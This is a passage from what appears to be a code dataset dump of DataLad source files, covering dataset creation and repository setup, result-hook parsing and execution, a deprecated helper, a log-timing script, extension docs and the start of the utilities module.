of whether we plan on adding\n # this new dataset to a parent) in order to avoid conflicts with\n # a potentially absent/uninstalled subdataset of the parent\n # in this location\n # it will cost some filesystem traversal though...\n parentds_path = get_dataset_root(\n op.normpath(op.join(str(path), os.pardir)))\n if parentds_path:\n prepo = GitRepo(parentds_path)\n parentds_path = Path(parentds_path)\n # we cannot get away with a simple\n # GitRepo.get_content_info(), as we need to detect\n # uninstalled/added subdatasets too\n check_path = Path(path)\n pstatus = prepo.status(\n untracked='no',\n # limit query to target path for a potentially massive speed-up\n paths=[check_path.relative_to(parentds_path)])\n if (not pstatus.get(check_path, {}).get(\"type\") == \"dataset\" and\n any(check_path == p or check_path in p.parents\n for p in pstatus)):\n # redo the check in a slower fashion, it is already broken\n # let's take our time for a proper error message\n conflict = [\n p for p in pstatus\n if check_path == p or check_path in p.parents]\n res.update({\n 'status': 'error',\n 'message': (\n 'collision with content in parent dataset at %s: %s',\n str(parentds_path),\n [str(c) for c in conflict])})\n yield res\n return\n if not force:\n # another set of check to see whether the target path is pointing\n # into a known subdataset that is not around ATM\n subds_status = {\n parentds_path / k.relative_to(prepo.path)\n for k, v in pstatus.items()\n if v.get('type', None) == 'dataset'}\n check_paths = [check_path]\n check_paths.extend(check_path.parents)\n if any(p in subds_status for p in check_paths):\n conflict = [p for p in check_paths if p in subds_status]\n res.update({\n 'status': 'error',\n 'message': (\n 'collision with %s (dataset) in dataset %s',\n str(conflict[0]),\n str(parentds_path))})\n yield res\n return\n\n # important to use the given Dataset object to avoid spurious ID\n # changes with not-yet-materialized Datasets\n tbds = ds if isinstance(ds, Dataset) and \\\n ds.path == path else Dataset(str(path))\n\n # don't create in non-empty directory without `force`:\n if op.isdir(tbds.path) and listdir(tbds.path) != [] and not force:\n res.update({\n 'status': 'error',\n 'message':\n 'will not create a dataset in a non-empty directory, use '\n '`--force` option to ignore'})\n yield res\n return\n\n # Check if specified cfg_proc(s) can be discovered, storing\n # the results so they can be used when the time comes to run\n # the procedure. If a procedure cannot be found, raise an\n # error to prevent creating the dataset.\n cfg_proc_specs = []\n if cfg_proc:\n discovered_procs = tbds.run_procedure(\n discover=True,\n result_renderer='disabled',\n return_type='list',\n )\n for cfg_proc_ in cfg_proc:\n for discovered_proc in discovered_procs:\n if discovered_proc['procedure_name'] == 'cfg_' + cfg_proc_:\n cfg_proc_specs.append(discovered_proc)\n break\n else:\n raise ValueError(\"Cannot find procedure with name \"\n \"'%s'\" % cfg_proc_)\n\n if initopts is not None and isinstance(initopts, list):\n initopts = {'_from_cmdline_': initopts}\n\n # Note for the code below:\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n # Re-use tbrepo instance, do not use tbds.repo\n\n # create and configure desired repository\n # also provides initial set of content to be tracked with git (not annex)\n if no_annex:\n tbrepo, add_to_git = _setup_git_repo(path, initopts, fake_dates)\n else:\n tbrepo, add_to_git = _setup_annex_repo(\n path, initopts, fake_dates, description)\n\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n # Note, must not happen earlier (before if) since \"smart\" it would not be\n tbds_config = tbds.config\n\n # record an ID for this repo for the afterlife\n # to be able to track siblings and children\n id_var = 'datalad.dataset.id'\n # Note, that Dataset property `id` will change when we unset the\n # respective config. Therefore store it before:\n tbds_id = tbds.id\n if id_var in tbds_config:\n # make sure we reset this variable completely, in case of a\n # re-create\n tbds_config.unset(id_var, scope='branch')\n\n if _seed is None:\n # just the standard way\n # use a fully random identifier (i.e. UUID version 4)\n uuid_id = str(uuid.uuid4())\n else:\n # Let's generate preseeded ones\n uuid_id = str(uuid.UUID(int=random.getrandbits(128)))\n tbds_config.add(\n id_var,\n tbds_id if tbds_id is not None else uuid_id,\n scope='branch',\n reload=False)\n\n # make config overrides permanent in the repo config\n # this is similar to what `annex init` does\n # we are only doing this for config overrides and do not expose\n # a dedicated argument, because it is sufficient for the cmdline\n # and unnecessary for the Python API (there could simply be a\n # subsequence ds.config.add() call)\n for k, v in tbds_config.overrides.items():\n tbds_config.add(k, v, scope='local', reload=False)\n\n # all config manipulation is done -> fll reload\n tbds_config.reload()\n\n # must use the repo.pathobj as this will have resolved symlinks\n add_to_git[tbrepo.pathobj / '.datalad'] = {\n 'type': 'directory',\n 'state': 'untracked'}\n\n # save everything, we need to do this now and cannot merge with the\n # call below, because we may need to add this subdataset to a parent\n # but cannot until we have a first commit\n tbrepo.save(\n message='[DATALAD] new dataset',\n git=True,\n # we have to supply our own custom status, as the repo does\n # not have a single commit yet and the is no HEAD reference\n # TODO make `GitRepo.status()` robust to this state.\n _status=add_to_git,\n )\n\n for cfg_proc_spec in cfg_proc_specs:\n yield from tbds.run_procedure(\n cfg_proc_spec,\n result_renderer='disabled',\n return_type='generator',\n )\n\n # the next only makes sense if we saved the created dataset,\n # otherwise we have no committed state to be registered\n # in the parent\n if isinstance(refds, Dataset) and refds.path != tbds.path:\n # we created a dataset in another dataset\n # -> make submodule\n yield from refds.save(\n path=tbds.path,\n return_type='generator',\n result_renderer='disabled',\n )\n else:\n # if we do not save, we touch the root directory of the new\n # dataset to signal a change in the nature of the directory.\n # this is useful for apps like datalad-gooey (or other\n # inotify consumers) to pick up on such changes.\n tbds.pathobj.touch()\n\n res.update({'status': 'ok'})\n yield res\n\n\ndef _setup_git_repo(path, initopts=None, fake_dates=False):\n \"\"\"Create and configure a repository at `path`\n\n Parameters\n ----------\n path: str or Path\n Path of the repository\n initopts: dict, optional\n Git options to be passed to the GitRepo constructor\n fake_dates: bool, optional\n Passed to the GitRepo constructor\n\n Returns\n -------\n GitRepo, dict\n Created repository and records for any repo component that needs to be\n passed to git-add as a result of the setup procedure.\n \"\"\"\n tbrepo = GitRepo(\n path,\n create=True,\n create_sanity_checks=False,\n git_opts=initopts,\n fake_dates=fake_dates)\n # place a .noannex file to indicate annex to leave this repo alone\n stamp_path = Path(tbrepo.path) / '.noannex'\n stamp_path.touch()\n add_to_git = {\n stamp_path: {\n 'type': 'file',\n 'state': 'untracked',\n }\n }\n return tbrepo, add_to_git\n\n\ndef _setup_annex_repo(path, initopts=None, fake_dates=False,\n description=None):\n \"\"\"Create and configure a repository at `path`\n\n This includes a default setup of annex.largefiles.\n\n Parameters\n ----------\n path: str or Path\n Path of the repository\n initopts: dict, optional\n Git options to be passed to the AnnexRepo constructor\n fake_dates: bool, optional\n Passed to the AnnexRepo constructor\n description: str, optional\n Passed to the AnnexRepo constructor\n\n Returns\n -------\n AnnexRepo, dict\n Created repository and records for any repo component that needs to be\n passed to git-add as a result of the setup procedure.\n \"\"\"\n # always come with annex when created from scratch\n tbrepo = AnnexRepo(\n path,\n create=True,\n create_sanity_checks=False,\n # do not set backend here, to avoid a dedicated commit\n backend=None,\n # None causes version to be taken from config\n version=None,\n description=description,\n git_opts=initopts,\n fake_dates=fake_dates\n )\n # set the annex backend in .gitattributes as a staged change\n tbrepo.set_default_backend(\n cfg.obtain('datalad.repo.backend'),\n persistent=True, commit=False)\n add_to_git = {\n tbrepo.pathobj / '.gitattributes': {\n 'type': 'file',\n 'state': 'added',\n }\n }\n # make sure that v6 annex repos never commit content under .datalad\n attrs_cfg = (\n ('config', 'annex.largefiles', 'nothing'),\n )\n attrs = tbrepo.get_gitattributes(\n [op.join('.datalad', i[0]) for i in attrs_cfg])\n set_attrs = []\n for p, k, v in attrs_cfg:\n if not attrs.get(\n op.join('.datalad', p), {}).get(k, None) == v:\n set_attrs.append((p, {k: v}))\n if set_attrs:\n tbrepo.set_gitattributes(\n set_attrs,\n attrfile=op.join('.datalad', '.gitattributes'))\n\n # prevent git annex from ever annexing .git* stuff (gh-1597)\n attrs = tbrepo.get_gitattributes('.git')\n if not attrs.get('.git', {}).get(\n 'annex.largefiles', None) == 'nothing':\n tbrepo.set_gitattributes([\n ('**/.git*', {'annex.largefiles': 'nothing'})])\n # must use the repo.pathobj as this will have resolved symlinks\n add_to_git[tbrepo.pathobj / '.gitattributes'] = {\n 'type': 'file',\n 'state': 'untracked'}\n return tbrepo, add_to_git\n" }, { "alpha_fraction": 0.5891954898834229, "alphanum_fraction": 0.5913978219032288, "avg_line_length": 35.58293914794922, "blob_id": "bb7163887fbe802527625d66a979b6154d528b2d", "content_id": "65a7bfeede05fcb93f4f16e9d2e42440087d4f0b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7719, "license_type": "permissive", "max_line_length": 87, "num_lines": 211, "path": "/datalad/core/local/resulthooks.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utility functions for result hooks\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport json\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger('datalad.core.local.resulthooks')\n\n\ndef get_jsonhooks_from_config(cfg):\n \"\"\"Parse out hook definitions given a ConfigManager instance\n\n Returns\n -------\n dict\n where keys are hook names/labels, and each value is a dict with\n three keys: 'cmd' contains the name of the to-be-executed DataLad\n command; 'args' has a JSON-encoded string with a dict of keyword\n arguments for the command (format()-language based placeholders\n can be present); 'match' holds a JSON-encoded string representing\n a dict with key/value pairs that need to match a result in order\n for a hook to be triggered.\n \"\"\"\n hooks = {}\n for h in cfg.keys():\n if not (h.startswith('datalad.result-hook.') and h.endswith('.match-json')):\n continue\n hook_basevar = h[:-11]\n hook_name = hook_basevar[20:]\n # do not use a normal `get()` here, because it reads the committed dataset\n # config too. That means a datalad update can silently bring in new\n # procedure definitions from the outside, and in some sense enable\n # remote code execution by a 3rd-party\n call = cfg.get_from_source(\n 'local',\n '{}.call-json'.format(hook_basevar),\n None\n )\n if not call:\n lgr.warning(\n 'Incomplete result hook configuration %s in %s' % (\n hook_basevar, cfg))\n continue\n # split command from any args\n call = call.split(maxsplit=1)\n # get the match specification in JSON format\n try:\n match = json.loads(cfg.get(h))\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Invalid match specification in %s: %s [%s], '\n 'hook will be skipped',\n h, cfg.get(h), ce)\n continue\n\n hooks[hook_name] = dict(\n cmd=call[0],\n # support no-arg calls too\n args=call[1] if len(call) > 1 else '{{}}',\n match=match,\n )\n return hooks\n\n\ndef match_jsonhook2result(hook, res, match):\n \"\"\"Evaluate a hook's result match definition against a concrete result\n\n A match definition is a dict that can contain any number of keys. For each\n key it is tested, if the value matches the one in a given result.\n If all present key/value pairs match, the hook is executed. In addition to\n ``==`` tests, ``in``, ``not in``, and ``!=`` tests are supported. The\n test operation can be given by wrapping the test value into a list, the\n first item is the operation label 'eq', 'neq', 'in', 'nin'; the second value\n is the test value (set). Example::\n\n {\n \"type\": [\"in\", [\"file\", \"directory\"]],\n \"action\": \"get\",\n \"status\": \"notneeded\"\n }\n\n If a to be tested value is a list, an 'eq' operation needs to be specified\n explicitly in order to disambiguate the definition.\n\n Parameters\n ----------\n hook : str\n Name of the hook\n res : dict\n Result dictionary\n match : dict\n Match definition (see above for details).\n\n Returns\n -------\n bool\n True if the given result matches the hook's match definition, or\n False otherwise.\n \"\"\"\n for k, v in match.items():\n # do not test 'k not in res', because we could have a match that\n # wants to make sure that a particular value is not present, and\n # not having the key would be OK in that case\n\n # in case the target value is an actual list, an explicit action 'eq'\n # must be given\n action, val = (v[0], v[1]) if isinstance(v, list) else ('eq', v)\n if action == 'eq':\n if k in res and res[k] == val:\n continue\n elif action == 'neq':\n if k not in res or res[k] != val:\n continue\n elif action == 'in':\n if k in res and res[k] in val:\n continue\n elif action == 'nin':\n if k not in res or res[k] not in val:\n continue\n else:\n lgr.warning(\n 'Unknown result comparison operation %s for hook %s, skipped',\n action, hook)\n # indentation level is intended!\n return False\n return True\n\n\ndef run_jsonhook(hook, spec, res, dsarg=None):\n \"\"\"Execute a hook on a given result\n\n A hook definition's 'call' specification may contain placeholders that\n will be expanded using matching values in the given result record. In\n addition to keys in the result a '{dsarg}' placeholder is supported.\n The characters '{' and '}' in the 'call' specification that are not part\n of format() placeholders have to be escaped as '{{' and '}}'. Example\n 'call' specification to execute the DataLad ``unlock`` command::\n\n unlock {{\"dataset\": \"{dsarg}\", \"path\": \"{path}\"}}\n\n Parameters\n ----------\n hook : str\n Name of the hook\n spec : dict\n Hook definition as returned by `get_hooks_from_config()`\n res : dict\n Result records that were found to match the hook definition.\n dsarg : Dataset or str or None, optional\n Value to substitute a {dsarg} placeholder in a hook 'call' specification\n with. Non-string values are automatically converted.\n\n Yields\n ------\n dict\n Any result yielded by the command executed as hook.\n \"\"\"\n import datalad.api as dl\n cmd_name = spec['cmd']\n if not hasattr(dl, cmd_name):\n # TODO maybe a proper error result?\n lgr.warning(\n 'Hook %s requires unknown command %s, skipped',\n hook, cmd_name)\n return\n cmd = getattr(dl, cmd_name)\n # apply potential substitutions on the string form of the args\n # for this particular result\n # take care of proper JSON encoding for each value\n enc = json.JSONEncoder().encode\n # we have to ensure JSON encoding of all values (some might be Path instances),\n # we are taking off the outer quoting, to enable flexible combination\n # of individual items in supplied command and argument templates\n args = spec['args'].format(\n # we cannot use a dataset instance directly but must take the\n # detour over the path location in order to have string substitution\n # be possible\n dsarg='' if dsarg is None else enc(dsarg.path).strip('\"')\n if isinstance(dsarg, dl.Dataset) else enc(dsarg).strip('\"'),\n # skip any present logger that we only carry for internal purposes\n **{k: enc(str(v)).strip('\"') for k, v in res.items() if k != 'logger'})\n # now load\n try:\n args = json.loads(args)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Invalid argument specification for hook %s '\n '(after parameter substitutions): %s [%s], '\n 'hook will be skipped',\n hook, args, ce)\n return\n # only debug level, the hook can issue its own results and communicate\n # through them\n lgr.debug('Running hook %s: %s%s', hook, cmd_name, args)\n for r in cmd(**args):\n yield r\n" }, { "alpha_fraction": 0.6001886129379272, "alphanum_fraction": 0.605374813079834, "avg_line_length": 31.136363983154297, "blob_id": "c02a7f55376863700d46de8b2f7bb1a4b156177c", "content_id": "180e293db425274ae3dad4ed6fc7de13f83a6f19", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2121, "license_type": "permissive", "max_line_length": 87, "num_lines": 66, "path": "/datalad/cmdline/helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport warnings\n\nfrom logging import getLogger\nlgr = getLogger('datalad.cmdline')\n\n\ndef get_repo_instance(path=os.curdir, class_=None):\n \"\"\"Returns an instance of appropriate datalad repository for path.\n Check whether a certain path is inside a known type of repository and\n returns an instance representing it. May also check for a certain type\n instead of detecting the type of repository.\n\n .. deprecated:: 0.16\n Use the pattern `Dataset(get_dataset_root(path)).repo` instead. This\n function will be removed in a future release.\n\n Parameters\n ----------\n path: str\n path to check; default: current working directory\n class_: class\n if given, check whether path is inside a repository, that can be\n represented as an instance of the passed class.\n\n Raises\n ------\n RuntimeError, in case cwd is not inside a known repository.\n \"\"\"\n warnings.warn(\"get_repo_instance() was deprecated in 0.16. \"\n \"It will be removed in a future release.\",\n DeprecationWarning)\n\n from datalad.utils import get_dataset_root\n from datalad.distribution.dataset import Dataset\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.gitrepo import GitRepo\n\n if class_ is not None:\n if class_ == AnnexRepo:\n type_ = \"annex\"\n elif class_ == GitRepo:\n type_ = \"git\"\n else:\n raise RuntimeError(\"Unknown class %s.\" % str(class_))\n else:\n type_ = ''\n\n dsroot = get_dataset_root(path)\n if not dsroot:\n raise RuntimeError(f\"No {type_}s repository found at {path}.\")\n\n return Dataset(dsroot).repo\n" }, { "alpha_fraction": 0.53515625, "alphanum_fraction": 0.5559895634651184, "avg_line_length": 25.947368621826172, "blob_id": "5caffa6956c8c07d323d6aef72b934a90b00a785", "content_id": "206df023413dcc3ca4543b7f35d4a74135eed0a9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1536, "license_type": "permissive", "max_line_length": 95, "num_lines": 57, "path": "/tools/dtime", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"Little helper to annotate logfile with difference between timestamps in consecutive lines\n\nIt prints time estimated from previous line on the previous line, with 0 always printed as well\nso it becomes possible to sort -n the output to see from what line it took longest to the next\n\"\"\"\n\nimport sys\nimport re\nfrom datetime import datetime\n\nreg = re.compile('^\\d{4}-\\d{2}-\\d{1,2} \\d{1,2}:\\d{1,2}:\\d{1,2},\\d{1,3}')\nprevt = None\nmaxl = 0\nprevl = None\n\nif len(sys.argv) <= 1:\n in_ = sys.stdin\nelse:\n in_ = open(sys.argv[1])\n\ntrailer = []\nfor l in in_:\n res = reg.search(l)\n dtstr = ''\n if res:\n end = res.end()\n t = datetime.strptime(l[:end], '%Y-%m-%d %H:%M:%S,%f')\n if prevt is not None:\n dt = t - prevt\n ms = dt.microseconds // 1000 + dt.seconds*1000\n dtstr = (\"%5d\" % ms if ms else ' 0')\n\n maxl = max(maxl, len(dtstr))\n dtstr = '%%%ds' % maxl % dtstr\n prevl = \"%s %s\" % (dtstr, prevl)\n prevt = t\n else:\n # no timestamp -- add to the trailer\n trailer.append(l)\n continue\n\n if prevl is not None:\n for l_ in trailer:\n sys.stdout.write(\" - \" + l_)\n trailer = []\n sys.stdout.write(prevl)\n\n if res:\n prevl = l\n\nif prevl:\n sys.stdout.write(\"----- \" + prevl)\nfor l_ in trailer:\n sys.stdout.write(\" - \" + l_)\n" }, { "alpha_fraction": 0.7659003734588623, "alphanum_fraction": 0.7678160667419434, "avg_line_length": 44.78947448730469, "blob_id": "fc573835727e2af922fcc3dc78b05c939b8330e5", "content_id": "88620655adfba20e2af82a6a2feb828610172f27", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2610, "license_type": "permissive", "max_line_length": 101, "num_lines": 57, "path": "/docs/source/customization.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_customization:\n\n********************************************\nCustomization and extension of functionality\n********************************************\n\nDataLad provides numerous commands that cover many use cases. However, there\nwill always be a demand for further customization or extensions of built-in\nfunctionality at a particular site, or for an individual user. DataLad\naddresses this need with a mechanism for extending particular DataLad\nfunctionality, such as metadata extractor, or providing entire command suites\nfor a specialized purpose.\n\nAs the name suggests, a :term:`DataLad extension` package is a proper Python package.\nConsequently, there is a significant amount of boilerplate code involved in the\ncreation of a new DataLad extension. However, this overhead enables a number of\nuseful features for extension developers:\n\n- extensions can provide any number of additional commands that can be grouped into\n labeled command suites, and are automatically exposed via the standard DataLad commandline\n and Python API\n- extensions can define `entry_points` for any number of additional metadata extractors\n that become automatically available to DataLad\n- extensions can define `entry_points` for their test suites, such that the standard `datalad create`\n command will automatically run these tests in addition to the tests shipped with DataLad core\n- extensions can ship additional dataset procedures by installing them into a\n directory ``resources/procedures`` underneath the extension module directory\n\n\nUsing an extension\n==================\n\nA :term:`DataLad extension` is a standard Python package. Beyond installation of the package there is\nno additional setup required.\n\n\nWriting your own extensions\n===========================\n\nA good starting point for implementing a new extension is the \"helloworld\" demo extension\navailable at https://github.com/datalad/datalad-extension-template. This repository can be cloned\nand adjusted to suit one's needs. It includes:\n\n- a basic Python package setup\n- simple demo command implementation\n- Travis test setup\n\nA more complex extension setup can be seen in the DataLad Neuroimaging\nextension: https://github.com/datalad/datalad-neuroimaging, including additional metadata extractors,\ntest suite registration, and a sphinx-based documentation setup for a DataLad extension.\n\nAs a DataLad extension is a standard Python package, an extension should declare\ndependencies on an appropriate DataLad version, and possibly other extensions\nvia the standard mechanisms.\n" }, { "alpha_fraction": 0.6034966111183167, "alphanum_fraction": 0.6084591150283813, "avg_line_length": 32.856590270996094, "blob_id": "4bd14d9331ffde880c4608d7ab608342396595c7", "content_id": "5e211351ab9193be24dbf7a2b2ccf84c8c8768f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96322, "license_type": "permissive", "max_line_length": 176, "num_lines": 2845, "path": "/datalad/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom __future__ import annotations\n\nimport builtins\nimport collections\nimport gc\nimport glob\nimport gzip\nimport inspect\nimport logging\nimport os\nimport os.path as op\nimport platform\nimport posixpath\nimport re\nimport shutil\nimport stat\nimport string\nimport sys\nimport tempfile\nimport threading\nimport time\nimport warnings\nfrom collections.abc import (\n Callable,\n Iterable,\n Iterator,\n Sequence,\n)\nfrom contextlib import contextmanager\nfrom copy import copy as shallow_copy\nfrom functools import (\n lru_cache,\n wraps,\n)\nfrom itertools import tee\n# this import is required because other modules import opj from here.\nfrom os.path import (\n abspath,\n basename,\n commonprefix,\n curdir,\n dirname,\n exists,\n expanduser,\n expandvars,\n isabs,\n isdir,\n islink,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n normpath,\n pardir,\n relpath,\n sep,\n split,\n splitdrive,\n)\nfrom pathlib import (\n Path,\n PurePath,\n PurePosixPath,\n)\nfrom shlex import quote as shlex_quote\nfrom shlex import split as shlex_split\nfrom tempfile import NamedTemporaryFile\nfrom time import sleep\nfrom types import (\n ModuleType,\n TracebackType,\n)\nfrom typing import (\n IO,\n Any,\n Dict,\n List,\n NamedTuple,\n Optional,\n TextIO,\n Tuple,\n TypeVar,\n Union,\n cast,\n overload,\n)\n\n# from datalad.dochelpers import get_docstring_split\nfrom datalad.consts import TIMESTAMP_FMT\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.typing import (\n K,\n Literal,\n P,\n T,\n V,\n)\n\n# handle this dance once, and import pathlib from here\n# in all other places\n\nlgr = logging.getLogger(\"datalad.utils\")\n\nlgr.log(5, \"Importing datalad.utils\")\n#\n# Some useful variables\n#\nplatform_system = platform.system().lower()\non_windows = platform_system == 'windows'\non_osx = platform_system == 'darwin'\non_linux = platform_system == 'linux'\n\n# COPY_BUFSIZE sort of belongs into datalad.consts, but that would lead to\n# circular import due to `on_windows`\ntry:\n from shutil import COPY_BUFSIZE # type: ignore[attr-defined]\nexcept ImportError: # pragma: no cover\n # too old\n from datalad.utils import on_windows\n\n # from PY3.10\n COPY_BUFSIZE = 1024 * 1024 if on_windows else 64 * 1024\n\n\n# Takes ~200msec, so should not be called at import time\n@lru_cache() # output should not change through life time of datalad process\ndef get_linux_distribution() -> tuple[str, str, str]:\n \"\"\"Compatibility wrapper for {platform,distro}.linux_distribution().\n \"\"\"\n if hasattr(platform, \"linux_distribution\"):\n # Use deprecated (but faster) method if it's available.\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n result = platform.linux_distribution()\n else:\n import distro # We require this for Python 3.8 and above.\n return (\n distro.id(),\n distro.version(),\n distro.codename(),\n )\n return result\n\n\n# Those weren't used for any critical decision making, thus we just set them to None\n# Use get_linux_distribution() directly where needed\nlinux_distribution_name = linux_distribution_release = None\n\n# Maximal length of cmdline string\n# Query the system and use hardcoded \"knowledge\" if None\n# probably getconf ARG_MAX might not be available\n# The last one would be the most conservative/Windows\nCMD_MAX_ARG_HARDCODED = 2097152 if on_linux else 262144 if on_osx else 32767\ntry:\n CMD_MAX_ARG = os.sysconf('SC_ARG_MAX')\n assert CMD_MAX_ARG > 0\n if CMD_MAX_ARG > CMD_MAX_ARG_HARDCODED * 1e6:\n # workaround for some kind of a bug which comes up with python 3.4\n # see https://github.com/datalad/datalad/issues/3150\n # or on older CentOS with conda and python as new as 3.9\n # see https://github.com/datalad/datalad/issues/5943\n # TODO: let Yarik know that the world is a paradise now whenever 1e6\n # is not large enough\n CMD_MAX_ARG = min(CMD_MAX_ARG, CMD_MAX_ARG_HARDCODED)\nexcept Exception as exc:\n # ATM (20181005) SC_ARG_MAX available only on POSIX systems\n # so exception would be thrown e.g. on Windows, or\n # somehow during Debian build for nd14.04 it is coming up with -1:\n # https://github.com/datalad/datalad/issues/3015\n CMD_MAX_ARG = CMD_MAX_ARG_HARDCODED\n lgr.debug(\n \"Failed to query or got useless SC_ARG_MAX sysconf, \"\n \"will use hardcoded value: %s\", exc)\n# Even with all careful computations we do, due to necessity to account for\n# environment and what not, we still could not figure out \"exact\" way to\n# estimate it, but it was shown that 300k safety margin on linux was sufficient.\n# https://github.com/datalad/datalad/pull/2977#issuecomment-436264710\n# 300k is ~15%, so to be safe, and for paranoid us we will just use up to 50%\n# of the length for \"safety margin\". We might probably still blow due to\n# env vars, unicode, etc... so any hard limit imho is not a proper solution\nCMD_MAX_ARG = int(0.5 * CMD_MAX_ARG)\nlgr.debug(\n \"Maximal length of cmdline string (adjusted for safety margin): %d\",\n CMD_MAX_ARG)\n\n#\n# Little helpers\n#\n\n# `getargspec` has been deprecated in Python 3.\nclass ArgSpecFake(NamedTuple):\n args: list[str]\n varargs: Optional[str]\n keywords: Optional[str]\n defaults: Optional[tuple[Any, ...]]\n\n\n# adding cache here somehow does break it -- even 'datalad wtf' does not run\n# @lru_cache() # signatures stay the same, why to \"redo\"? brings it into ns from mks\ndef getargspec(func: Callable[..., Any], *, include_kwonlyargs: bool=False) -> ArgSpecFake:\n \"\"\"Compat shim for getargspec deprecated in python 3.\n\n The main difference from inspect.getargspec (and inspect.getfullargspec\n for that matter) is that by using inspect.signature we are providing\n correct args/defaults for functools.wraps'ed functions.\n\n `include_kwonlyargs` option was added to centralize getting all args,\n even the ones which are kwonly (follow the ``*,``).\n\n For internal use and not advised for use in 3rd party code.\n Please use inspect.signature directly.\n \"\"\"\n # We use signature, and not getfullargspec, because only signature properly\n # \"passes\" args from a functools.wraps decorated function.\n # Note: getfullargspec works Ok on wrapt-decorated functions\n f_sign = inspect.signature(func)\n # Loop through parameters and compose argspec\n args: list[str] = []\n varargs: Optional[str] = None\n keywords: Optional[str] = None\n defaults: dict[str, Any] = {}\n # Collect all kwonlyargs into a dedicated dict - name: default\n kwonlyargs: dict[str, Any] = {}\n P = inspect.Parameter\n\n for p_name, p in f_sign.parameters.items():\n if p.kind in (P.POSITIONAL_ONLY, P.POSITIONAL_OR_KEYWORD):\n assert not kwonlyargs # yoh: must not come after kwonlyarg\n args.append(p_name)\n if p.default is not P.empty:\n defaults[p_name] = p.default\n elif p.kind == P.VAR_POSITIONAL:\n varargs = p_name\n elif p.kind == P.VAR_KEYWORD:\n keywords = p_name\n elif p.kind == P.KEYWORD_ONLY:\n assert p.default is not P.empty\n kwonlyargs[p_name] = p.default\n\n if kwonlyargs:\n if not include_kwonlyargs:\n raise ValueError(\n 'Function has keyword-only parameters or annotations, either use '\n 'inspect.signature() API which can support them, or provide include_kwonlyargs=True '\n 'to this function'\n )\n else:\n args.extend(list(kwonlyargs))\n defaults.update(kwonlyargs)\n\n # harmonize defaults to how original getargspec returned them -- just a tuple\n d_defaults = None if not defaults else tuple(defaults.values())\n return ArgSpecFake(args, varargs, keywords, d_defaults)\n\n\n# Definitions to be (re)used in the next function\n_SIG_P = inspect.Parameter\n_SIG_KIND_SELECTORS: dict[str, set[int]] = {\n 'pos_only': {_SIG_P.POSITIONAL_ONLY,},\n 'pos_any': {_SIG_P.POSITIONAL_ONLY, _SIG_P.POSITIONAL_OR_KEYWORD},\n 'kw_any': {_SIG_P.POSITIONAL_OR_KEYWORD, _SIG_P.KEYWORD_ONLY},\n 'kw_only': {_SIG_P.KEYWORD_ONLY,},\n}\n_SIG_KIND_SELECTORS['any'] = set().union(*_SIG_KIND_SELECTORS.values())\n\n\n@lru_cache() # signatures stay the same, why to \"redo\"? brings it into ns from mks\ndef get_sig_param_names(f: Callable[..., Any], kinds: tuple[str, ...]) -> tuple[list[str], ...]:\n \"\"\"A helper to selectively return parameters from inspect.signature.\n\n inspect.signature is the ultimate way for introspecting callables. But\n its interface is not so convenient for a quick selection of parameters\n (AKA arguments) of desired type or combinations of such. This helper\n should make it easier to retrieve desired collections of parameters.\n\n Since often it is desired to get information about multiple specific types\n of parameters, `kinds` is a list, so in a single invocation of `signature`\n and looping through the results we can obtain all information.\n\n Parameters\n ----------\n f: callable\n kinds: tuple with values from {'pos_any', 'pos_only', 'kw_any', 'kw_only', 'any'}\n Is a list of what kinds of args to return in result (tuple). Each element\n should be one of: 'any_pos' - positional or keyword which could be used\n positionally. 'kw_only' 